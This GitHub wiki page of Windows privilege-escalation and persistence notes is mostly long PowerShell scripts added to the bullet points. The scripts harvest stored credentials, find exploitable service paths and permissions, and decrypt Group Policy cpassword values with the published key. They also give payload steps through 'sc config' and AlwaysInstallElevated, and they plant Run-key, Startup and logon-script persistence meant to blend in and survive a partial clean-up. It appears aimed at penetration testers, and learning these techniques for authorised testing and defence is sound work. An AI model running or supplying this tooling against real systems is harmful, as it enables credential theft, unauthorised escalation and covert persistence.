Privilege Escalation - caitlinmallen/TechWiki GitHub Wiki

Privilege Escalation

  • Privilege Escalation Methods
    • There are many privilege escalation methods on Windows, for example
      • Stored credentials
      • Windows kernel exploits
      • DLL hijacking
      • Unquoted service paths
      • Etc
  • Stored Credentials
    • Search the registry for usernames, passwords and configuration data (Winlogon autologon values, third-party application keys)
    • Search the file system for configuration and credential files (unattend.xml, web.config, scripts), dump the passwords with PowerShell and use them to log on as a higher-privileged account
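Added example of the registry and file-system hunt described above (editor's code, not from the wiki). The Winlogon key is the real location of autologon passwords; the hive roots, file name patterns and search terms are assumptions to widen per target.

```powershell
# Added example, not part of the wiki: hunt for stored credentials in the
# registry and in well-known configuration files. Roots, file patterns and
# search terms are assumptions; widen them for the target.

function Get-AutologonCredential {
    # Winlogon autologon keeps the password in clear text in DefaultPassword
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($p -and $p.DefaultPassword) {
        [pscustomobject]@{
            Source   = 'Winlogon autologon'
            Domain   = $p.DefaultDomainName
            UserName = $p.DefaultUserName
            Password = $p.DefaultPassword
        }
    }
}

function Find-RegistryPassword {
    # Walk whole hives (slow) looking for value names or data that mention a password
    param([string[]]$Roots = @('HKLM:\SOFTWARE', 'HKCU:\SOFTWARE'))
    foreach ($root in $Roots) {
        Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $k = $_
            foreach ($name in $k.GetValueNames()) {
                $data = [string]$k.GetValue($name)
                if ($name -match 'passw(or)?d|pwd' -or $data -match 'passw(or)?d\s*=') {
                    [pscustomobject]@{ Key = $k.Name; Value = $name; Data = $data }
                }
            }
        }
    }
}

function Find-CredentialFile {
    # Files that commonly carry plaintext or base64 credentials; -List reports
    # one hit per file so the output stays readable
    param([string]$Root = 'C:\')
    $patterns = 'unattend.xml', 'sysprep.inf', 'web.config', '*.rdp', '*.ps1', '*.config', '*.ini', '*.txt'
    Get-ChildItem -Path $Root -Recurse -Include $patterns -File -ErrorAction SilentlyContinue |
        Select-String -Pattern 'password', 'passwd', 'pwd' -SimpleMatch -List |
        Select-Object Path, LineNumber, @{ n = 'Line'; e = { $_.Line.Trim() } }
}

# Usage
Get-AutologonCredential
Find-RegistryPassword -Roots 'HKCU:\SOFTWARE' | Format-Table -AutoSize
Find-CredentialFile -Root 'C:\Users' | Format-Table -AutoSize
```

Run the registry walk against HKCU first; a full HKLM\SOFTWARE walk takes minutes and is noisy in the registry audit log if auditing is enabled.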
  • Windows Kernel Exploit
    • Missing operating system patches: compare the build number and installed hotfixes (systeminfo, Get-HotFix) against publicly known local kernel vulnerabilities
    • An unpatched kernel lets any local user run an exploit and obtain SYSTEM; kernel exploits can also crash the host, so on production systems they are the last resort, not the first
  • DLL Hijacking
    • Place a malicious DLL on the system where a privileged process will load it
    • When a program loads a DLL by name Windows walks the DLL search order (application directory, system directories, current directory, then each PATH entry); if the DLL is missing, or an earlier directory in that order is writable, the attacker drops a DLL with the expected name there and it executes with the privileges of the loading process
  • Unquoted service paths
    • The binPath attribute (ImagePath in the registry) declares the location of the binary Windows executes when a service starts
    • If the path is unquoted and contains spaces, Windows tries each prefix that ends at a space as an executable before the full path (C:\Program.exe, then C:\Program Files\My.exe, then the real binary), so an attacker who can write to one of those intermediate folders drops a binary there and it runs as the service account
      • Service path is unquoted
      • Path contains a space
      • Attacker has write permission in one of the intermediate folders
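Added example (editor's code, not from the wiki) that automates the DLL hijacking and unquoted service path checks above: it lists PATH directories the current user can write to, and lists services whose unquoted binPath has a writable intermediate folder, naming the exact file Windows would try to execute first. The argument-stripping rule and the exclusion of C:\Windows paths are assumptions.

```powershell
# Added example, not part of the wiki. Finds writable PATH directories (DLL
# hijacking) and writable intermediate folders of unquoted service paths.

function Test-DirWritable {
    # Really try to create a file: ACL inspection alone misses deny ACEs and
    # nested group membership. The probe file is removed again.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path -Path $Path -ChildPath ('probe_{0}.tmp' -f [guid]::NewGuid())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-WritablePathDir {
    # PATH is the last stop in the DLL search order, so a writable entry lets a
    # low-privilege user supply any DLL that a privileged process fails to find earlier
    $env:Path -split ';' | Where-Object { $_ } | Select-Object -Unique |
        Where-Object { Test-DirWritable -Path $_ } |
        ForEach-Object { [pscustomobject]@{ Directory = $_; HijackRisk = 'writable PATH entry' } }
}

function Get-UnquotedPathCandidate {
    # For an unquoted path with spaces, CreateProcess tries each prefix that
    # ends at a space (plus .exe) before it reaches the real binary.
    # Assumption: service arguments start with " -" or " /".
    param([string]$PathName)
    $exe = ($PathName -split '\s+[-/]')[0].Trim()
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Length; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Find-UnquotedServicePath {
    # Assumption: services under C:\Windows are skipped (svchost entries are unquoted by design)
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and
                       $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' } |
        ForEach-Object {
            $svc = $_
            foreach ($candidate in Get-UnquotedPathCandidate -PathName $svc.PathName) {
                $dir = Split-Path -Path $candidate -Parent
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    PathName  = $svc.PathName
                    Candidate = $candidate      # the file Windows would run first
                    Writable  = Test-DirWritable -Path $dir
                }
            }
        } |
        Where-Object { $_.Writable }
}

# Usage
Find-WritablePathDir | Format-Table -AutoSize
Find-UnquotedServicePath | Format-Table -AutoSize
```

The probe-file test is deliberate: on a default install a standard user can create folders but not files in C:\, so an ACL-only check would wrongly report C:\Program.exe as plantable.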
  • Weak Folder Permissions
    • If a user has write permission on the folder that holds a service binary, the user can replace the binary with a malicious one
    • When the service is restarted (or the host reboots) the malicious binary executes with the service account's privileges, often LocalSystem
    • Replace the file by copying the payload over the service binary; keep a copy of the original so it can be restored afterwards
  • Weak Service Permissions
    • Services created with a weak security descriptor (check it with sc sdshow <name> or accesschk) can lead to privilege escalation
    • If Authenticated Users (or another broad group) holds SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG on a service, any user can rewrite the service configuration, including the binary it runs
    • When Windows starts the service it calls the binary's ServiceMain function and expects it to report back to the Service Control Manager; a plain payload never does, so sc start reports an error after the timeout, but by then the payload has already run as the service account
    • Modify the config (sc config <name> binPath= "<payload>") and start the service to execute the payload
  • Weak Registry Permissions
    • Service configuration lives under HKLM\SYSTEM\CurrentControlSet\Services\<service_name>; the ImagePath value holds the binary path
    • If a low-privilege user has Full Control (or just SetValue) on that key, ImagePath can be pointed at the attacker's binary, which the service executes on its next start
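Added example (editor's code, not from the wiki) covering the three weak-permission cases above in one sweep: it parses the service security descriptor from sc sdshow for SERVICE_CHANGE_CONFIG or WRITE_DAC granted to broad groups, checks the binary and its folder for write-type rights, and checks the service registry key for SetValue. The list of "broad" principals, the argument-stripping rule and the service name MyService in the usage comment are assumptions.

```powershell
# Added example, not part of the wiki: find write rights that broad groups hold on
# a service object, on its binary and folder, and on its registry key.

$BroadPrincipals = 'Everyone', 'BUILTIN\Users',
                   'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'

# Service access-right bits (winsvc.h / winnt.h)
$SERVICE_CHANGE_CONFIG = 0x0002
$SERVICE_START         = 0x0010
$SERVICE_STOP          = 0x0020
$WRITE_DAC             = 0x40000
$WRITE_OWNER           = 0x80000
$SERVICE_ALL_ACCESS    = 0xF01FF

function Resolve-Sid {
    param([System.Security.Principal.SecurityIdentifier]$Sid)
    try { $Sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $Sid.Value }
}

function Get-ServiceDacl {
    # "sc sdshow" prints the service security descriptor as SDDL; parse it into ACEs
    param([string]$Name)
    $sddl = ((sc.exe sdshow $Name) -join '').Trim()
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        [pscustomobject]@{ Type = $ace.AceType; Principal = (Resolve-Sid $ace.SecurityIdentifier); Mask = $ace.AccessMask }
    }
}

function Test-WeakServicePermission {
    param([string]$Name)
    $writeMask = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER
    Get-ServiceDacl -Name $Name |
        Where-Object { $_.Type -eq 'AccessAllowed' -and $BroadPrincipals -contains $_.Principal -and ($_.Mask -band $writeMask) } |
        ForEach-Object {
            [pscustomobject]@{
                Service      = $Name
                Principal    = $_.Principal
                ChangeConfig = [bool]($_.Mask -band $SERVICE_CHANGE_CONFIG)
                StartStop    = [bool](($_.Mask -band $SERVICE_START) -and ($_.Mask -band $SERVICE_STOP))
                AllAccess    = (($_.Mask -band $SERVICE_ALL_ACCESS) -eq $SERVICE_ALL_ACCESS)
            }
        }
}

function Get-ServiceBinaryPath {
    # Strip quotes and arguments from PathName; assumption: arguments start with - or /
    param([string]$Name)
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    if (-not $svc.PathName) { return $null }
    if ($svc.PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($svc.PathName -split '\s+[-/]')[0].Trim()
}

function Test-WeakServiceFileAcl {
    # Modify/Write on the binary or its folder lets a user swap the binary
    param([string]$Name)
    $exe = Get-ServiceBinaryPath -Name $Name
    if (-not $exe) { return }
    foreach ($target in @($exe, (Split-Path -Path $exe -Parent))) {
        if (-not (Test-Path -LiteralPath $target)) { continue }
        (Get-Acl -LiteralPath $target).Access |
            Where-Object { $_.AccessControlType -eq 'Allow' -and $BroadPrincipals -contains $_.IdentityReference.Value -and
                           $_.FileSystemRights -match 'Modify|FullControl|Write|CreateFiles|ChangePermissions|TakeOwnership' } |
            ForEach-Object { [pscustomobject]@{ Service = $Name; Path = $target; Principal = $_.IdentityReference.Value; Rights = $_.FileSystemRights } }
    }
}

function Test-WeakServiceRegistryAcl {
    # SetValue on the Services key lets a user rewrite ImagePath
    param([string]$Name)
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    if (-not (Test-Path -Path $key)) { return }
    (Get-Acl -Path $key).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and $BroadPrincipals -contains $_.IdentityReference.Value -and
                       $_.RegistryRights -match 'SetValue|FullControl|WriteKey|ChangePermissions|TakeOwnership' } |
        ForEach-Object { [pscustomobject]@{ Service = $Name; Key = $key; Principal = $_.IdentityReference.Value; Rights = $_.RegistryRights } }
}

# Usage: sweep every service
Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    Test-WeakServicePermission $_.Name; Test-WeakServiceFileAcl $_.Name; Test-WeakServiceRegistryAcl $_.Name
}
# With ChangeConfig = True the exploit step from the notes is (MyService is a placeholder):
#   sc.exe config MyService binPath= "C:\Users\Public\payload.exe"   (the space after binPath= is required)
#   sc.exe start MyService
```

Generic rights (GENERIC_WRITE and friends) show up as raw numbers in FileSystemRights and are not matched by the regex; inspect those ACEs by hand.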
  • Always Install Elevated
    • When the AlwaysInstallElevated policy is set to 1 under both HKLM and HKCU (Software\Policies\Microsoft\Windows\Installer), Windows Installer runs every MSI as SYSTEM, so a low-privilege user escalates by installing a malicious MSI (msiexec /quiet /i payload.msi)
  • Modifiable Autorun
    • If the binary referenced by an autorun entry (Run/RunOnce registry keys, all-users Startup folder) is writable, the attacker can replace the file with a payload, or change the autorun path to point at one
    • When a member of the Administrators group next logs on, the payload runs in that user's context; on a UAC-enabled host it starts with the admin's filtered (Medium integrity) token, so a UAC bypass may still be needed for full elevation
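Added example (editor's code, not from the wiki) for the two checks above: whether AlwaysInstallElevated is set in both hives, and which machine-wide autorun targets a broad group can overwrite. The set of autorun locations and the list of broad principals are assumptions.

```powershell
# Added example, not part of the wiki: the AlwaysInstallElevated check and a
# sweep of autorun locations for targets a low-privilege user could replace.

function Test-AlwaysInstallElevated {
    # The policy only takes effect when the value is 1 under BOTH hives
    $sub = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $hklm = (Get-ItemProperty -Path "HKLM:\$sub" -ErrorAction SilentlyContinue).AlwaysInstallElevated
    $hkcu = (Get-ItemProperty -Path "HKCU:\$sub" -ErrorAction SilentlyContinue).AlwaysInstallElevated
    [pscustomobject]@{ HKLM = $hklm; HKCU = $hkcu; Exploitable = ($hklm -eq 1 -and $hkcu -eq 1) }
}
# If Exploitable is True, any MSI runs as SYSTEM:  msiexec /quiet /qn /i payload.msi

$BroadPrincipals = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'

function Get-WeakFileAce {
    # Allow ACEs that give a broad group write-type rights on a file or folder
    param([string]$Path)
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and $BroadPrincipals -contains $_.IdentityReference.Value -and
        $_.FileSystemRights -match 'Modify|FullControl|Write|CreateFiles'
    }
}

function Get-AutorunTarget {
    # Pull the executable out of a Run-key command line (quoted, or the first token)
    param([string]$Command)
    $cmd = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($cmd -match '^"([^"]+)"') { return $Matches[1] }
    return ($cmd -split '\s+')[0]
}

function Find-ModifiableAutorun {
    # HKLM Run keys and the all-users Startup folder execute for every user who
    # logs on, administrators included
    $runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    foreach ($key in $runKeys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        # Get-ItemProperty adds PS* metadata properties; everything else is an entry
        foreach ($entry in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
            $target = Get-AutorunTarget -Command ([string]$entry.Value)
            if (-not (Test-Path -LiteralPath $target -PathType Leaf)) { continue }
            $weak = @(Get-WeakFileAce -Path $target)
            if ($weak.Count) {
                [pscustomobject]@{ Location = $key; Entry = $entry.Name; Target = $target
                                   WritableBy = ($weak.IdentityReference.Value -join ', ') }
            }
        }
    }
    $startup = [Environment]::GetFolderPath('CommonStartup')
    $weak = @(Get-WeakFileAce -Path $startup)
    if ($weak.Count) {
        [pscustomobject]@{ Location = $startup; Entry = '(folder)'; Target = $startup
                           WritableBy = ($weak.IdentityReference.Value -join ', ') }
    }
}

# Usage
Test-AlwaysInstallElevated
Find-ModifiableAutorun | Format-Table -AutoSize
```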
  • Tater/Hot Potato
    • Hot Potato (Tater is the PowerShell implementation)
    • Chains known Windows behaviours (NBNS spoofing, a fake local WPAD proxy and NTLM relay from HTTP to the local SMB service) to gain local privilege escalation on default configurations; the relay was closed by MS16-075, which is why the later Potato variants moved to DCOM
  • Token Manipulation
    • Starts from a compromised service account such as the one running IIS, Apache, SQL Server, etc, because these accounts usually hold SeImpersonatePrivilege
      • Used by pen testers in engagements
    • Rotten Potato
      • Tricks the NT AUTHORITY\SYSTEM account into authenticating to a local listener (via DCOM/RPC activation)
      • Performs a man-in-the-middle of that NTLM authentication
      • Impersonates the token just negotiated; requires SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
    • Juicy Potato
      • Generalises Rotten Potato, which depended on the BITS service CLSID and its listener on 127.0.0.1:6666; Juicy Potato lets the attacker pick any DCOM CLSID and listening port, so it still works where BITS is disabled or the port is taken
  • Abusing Tokens
    • Exploitable token privileges (SeImpersonate, SeAssignPrimaryToken, SeDebug, SeBackup, SeRestore, SeTakeOwnership, SeLoadDriver) can be used on their own to reach SYSTEM; list them with whoami /priv
    • Three ways
      • Exploitable privileges
      • Exploitable partial writes
      • Abusing existing service accounts
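Added example (editor's code, not from the wiki) for the token-privilege check above: it parses the output of whoami /priv and flags the privileges that give a standalone route to SYSTEM, including the SeImpersonate/SeAssignPrimaryToken pair the Potato family needs. The privilege-to-technique mapping is the editor's summary and the sample output is constructed.

```powershell
# Added example, not part of the wiki: parse "whoami /priv" and flag the
# privileges that give a standalone route to SYSTEM. The privilege-to-technique
# mapping is the editor's summary; the sample output is constructed.

$DangerousPrivileges = @{
    'SeImpersonatePrivilege'        = 'Potato family: impersonate a SYSTEM token obtained from a coerced authentication'
    'SeAssignPrimaryTokenPrivilege' = 'Same route as SeImpersonate, via a new process with a SYSTEM primary token'
    'SeDebugPrivilege'              = 'Open any process, e.g. inject into or dump lsass.exe'
    'SeBackupPrivilege'             = 'Read any file regardless of ACL, e.g. the SAM and SYSTEM hives'
    'SeRestorePrivilege'            = 'Write any file regardless of ACL, e.g. replace a service binary'
    'SeTakeOwnershipPrivilege'      = 'Take ownership of any object, then grant yourself write access'
    'SeLoadDriverPrivilege'         = 'Load a kernel driver'
    'SeTcbPrivilege'                = 'Act as part of the OS: create arbitrary tokens'
}

function Get-TokenPrivilege {
    # Each data line is "<Name> <Description> <Enabled|Disabled>"; the description
    # column can be separated from the state by a single space, so anchor on the state
    param([string[]]$WhoamiOutput = (whoami /priv))
    foreach ($line in $WhoamiOutput) {
        if ($line -match '^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$') {
            [pscustomobject]@{ Name = $Matches[1]; Description = $Matches[2]; State = $Matches[3] }
        }
    }
}

function Find-ExploitablePrivilege {
    param([string[]]$WhoamiOutput = (whoami /priv))
    Get-TokenPrivilege -WhoamiOutput $WhoamiOutput |
        Where-Object { $DangerousPrivileges.ContainsKey($_.Name) } |
        ForEach-Object {
            [pscustomobject]@{
                Privilege = $_.Name
                State     = $_.State   # Disabled only means not yet enabled; the holder can enable it
                UseCase   = $DangerousPrivileges[$_.Name]
            }
        }
}

# Constructed sample: what a typical IIS or SQL Server service account shows
$sample = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
'@ -split "`r?`n"

Find-ExploitablePrivilege -WhoamiOutput $sample | Format-Table -AutoSize
# Against the live token: Find-ExploitablePrivilege
```

On the constructed sample the function reports SeAssignPrimaryTokenPrivilege (Disabled) and SeImpersonatePrivilege (Enabled); a Disabled privilege is still held by the token, so it counts.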
  • Configs and Password Files
  • Credential Manager
    • Lets a user view and delete saved credentials for signing into websites, connected apps and networks (cmdkey /list shows the Windows credentials)
    • One of the first steps an attacker performs is to enumerate Credential Manager and the other credential stores for saved local admin credentials
    • Admin passwords set through Group Policy Preferences (the cpassword attribute in SYSVOL XML files) can be retrieved and decrypted by any domain user, because Microsoft published the AES key
    • Third-party software may store credentials here
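Added example (editor's code, not from the wiki) for the Group Policy Preferences point above: a decryptor for cpassword values using the AES-256 key Microsoft published in the MS-GPPREF specification, an encryptor so the round trip can be tested offline, and a SYSVOL sweep. The plaintext in the usage line and the SYSVOL path derived from USERDNSDOMAIN are assumptions.

```powershell
# Added example, not part of the wiki: decrypt Group Policy Preferences
# cpassword values. The AES-256 key is the one Microsoft published in the
# MS-GPPREF specification; the plaintext and SYSVOL path below are assumptions.

$GppKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                   0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppAes {
    # AES-256-CBC with a fixed key and an all-zero IV: the only secret is the key, and it is public
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $GppKey
    $aes.IV = New-Object byte[] 16
    $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes
}

function ConvertFrom-GppPassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    $b64 = $Cpassword.Trim()
    switch ($b64.Length % 4) { 2 { $b64 += '==' } 3 { $b64 += '=' } }  # GPP strips the base64 padding
    $aes = New-GppAes
    try {
        $cipher = [Convert]::FromBase64String($b64)
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
        [System.Text.Encoding]::Unicode.GetString($plain)   # passwords are stored as UTF-16LE
    } finally { $aes.Dispose() }
}

function ConvertTo-GppPassword {
    # Inverse operation, useful to test the decryptor without a real SYSVOL
    param([Parameter(Mandatory)][string]$Password)
    $aes = New-GppAes
    try {
        $plain = [System.Text.Encoding]::Unicode.GetBytes($Password)
        $cipher = $aes.CreateEncryptor().TransformFinalBlock($plain, 0, $plain.Length)
        [Convert]::ToBase64String($cipher).TrimEnd('=')
    } finally { $aes.Dispose() }
}

function Find-GppPassword {
    # Every domain user can read SYSVOL; these preference files carry cpassword
    param([string]$SysvolRoot = "\\$env:USERDNSDOMAIN\SYSVOL")
    $files = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Drives.xml', 'Printers.xml'
    Get-ChildItem -Path $SysvolRoot -Recurse -Include $files -File -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_.FullName
        [xml]$doc = Get-Content -LiteralPath $file -Raw
        foreach ($node in $doc.SelectNodes('//Properties[@cpassword]')) {
            # The account attribute name differs per file type
            $user = foreach ($a in 'userName', 'accountName', 'runAs', 'username') { $node.GetAttribute($a) }
            [pscustomobject]@{
                File     = $file
                User     = ($user | Where-Object { $_ } | Select-Object -First 1)
                Password = ConvertFrom-GppPassword -Cpassword $node.GetAttribute('cpassword')
            }
        }
    }
}

# Usage: round trip a constructed password, then sweep SYSVOL
$cp = ConvertTo-GppPassword -Password 'Summer2024!'
"{0} -> {1}" -f $cp, (ConvertFrom-GppPassword -Cpassword $cp)
Find-GppPassword | Format-Table -AutoSize
```

MS14-025 removed the ability to set new cpassword values, but it did not clean up existing preference files, so old entries are still worth looking for.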
  • Fake Login
    • Common method of fooling the victim into typing credentials into a fake prompt that the attacker controls, such as a spoofed Windows credential dialog or a cloned login page
  • LSASS Dumping passwords
    • Extract credentials, locally or remotely, from the memory of the Local Security Authority Subsystem Service (lsass.exe)
    • LSASS hosts the security support providers (msv1_0, kerberos, wdigest, tspkg, ...), the packages that manage the different authentication types and that cache hashes, tickets and sometimes plaintext passwords
    • Can use extraction tools like Mimikatz (sekurlsa::logonpasswords); this needs SeDebugPrivilege, i.e. local admin, and LSA Protection (RunAsPPL) or Credential Guard will block or limit it

Persistence

  • Persistence Methods
    • Startup folders
    • Registry keys
    • Etc
  • Guides to Persistence
    • Decide on the persistence strategy before planting anything
    • Take time to understand the limitations and advantages of each method (trigger, required privileges, noise)
    • Experiment with different payloads
    • Learn about staged and stageless payloads (a stager fetches the real payload at run time; a stageless payload carries everything, so it still starts when the C2 is unreachable)
    • Use different transports (HTTP/S, DNS, SMB named pipes) so persistence does not depend on a single channel
  • Logon Scripts
    • Use scripts that run automatically at boot or user logon (Group Policy logon scripts, or the UserInitMprLogonScript value under HKCU\Environment) to re-establish access
    • Runs at every logon, so it maintains persistence without user interaction
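Added example (editor's code, not from the wiki) that plants, lists and removes the three user-level persistence methods named in this section: a Run key, a Startup folder shortcut and the UserInitMprLogonScript logon script. The payload path and the entry name are assumptions; all three run as the user who logs on, at that user's integrity level.

```powershell
# Added example, not part of the wiki: plant, list and remove three user-level
# persistence mechanisms from the notes. Payload path and entry name are
# assumptions. Everything here runs as the user who logs on, at their integrity level.

$Payload   = 'C:\Users\Public\payload.exe'   # assumption: already dropped on the host
$EntryName = 'Updater'                        # assumption: a name that blends in

$RunKey  = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$EnvKey  = 'HKCU:\Environment'
$Startup = [Environment]::GetFolderPath('Startup')   # per-user Startup folder

function Install-UserPersistence {
    param([string]$Path = $Payload, [string]$Name = $EntryName)
    # 1. Run key: Explorer launches the value at every interactive logon of this user
    New-ItemProperty -Path $RunKey -Name $Name -Value "`"$Path`"" -PropertyType String -Force | Out-Null
    # 2. Startup folder shortcut, also run by Explorer at logon
    $shell = New-Object -ComObject WScript.Shell
    $lnk = $shell.CreateShortcut((Join-Path -Path $Startup -ChildPath "$Name.lnk"))
    $lnk.TargetPath = $Path
    $lnk.Save()
    # 3. Legacy logon script: userinit.exe runs UserInitMprLogonScript at logon,
    #    with no Group Policy involved
    New-ItemProperty -Path $EnvKey -Name UserInitMprLogonScript -Value $Path -PropertyType String -Force | Out-Null
}

function Get-UserPersistence {
    # What is currently planted; the same three places a defender checks first
    param([string]$Name = $EntryName)
    [pscustomobject]@{
        RunKey      = (Get-ItemProperty -Path $RunKey -ErrorAction SilentlyContinue).$Name
        StartupLnk  = Test-Path -LiteralPath (Join-Path -Path $Startup -ChildPath "$Name.lnk")
        LogonScript = (Get-ItemProperty -Path $EnvKey -ErrorAction SilentlyContinue).UserInitMprLogonScript
    }
}

function Remove-UserPersistence {
    # Clean-up at the end of an engagement
    param([string]$Name = $EntryName)
    Remove-ItemProperty -Path $RunKey -Name $Name -ErrorAction SilentlyContinue
    Remove-Item -LiteralPath (Join-Path -Path $Startup -ChildPath "$Name.lnk") -ErrorAction SilentlyContinue
    Remove-ItemProperty -Path $EnvKey -Name UserInitMprLogonScript -ErrorAction SilentlyContinue
}

# Usage
Install-UserPersistence
Get-UserPersistence
# Remove-UserPersistence
```

Three mechanisms are planted on purpose: Run keys and Startup folders are the first places an Autoruns sweep looks, while the Environment logon script is less often reviewed, so the foothold survives a partial clean-up.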
  • Levels of Persistence
    • Persistence inherits the integrity level of the context that planted it: a standard user's logon items run at Medium mandatory level, so they survive only for that user and grant no admin rights by themselves; High (elevated admin) or System (service) persistence needs an elevated foothold first
  • Process and DLL Injection
    • A DLL search order hijack uses the search order (application directory, system directories, then PATH) to get a malicious DLL loaded by a legitimate process every time that process starts
    • Threat actors use it for persistence because the payload runs inside a trusted process rather than as a new, suspicious one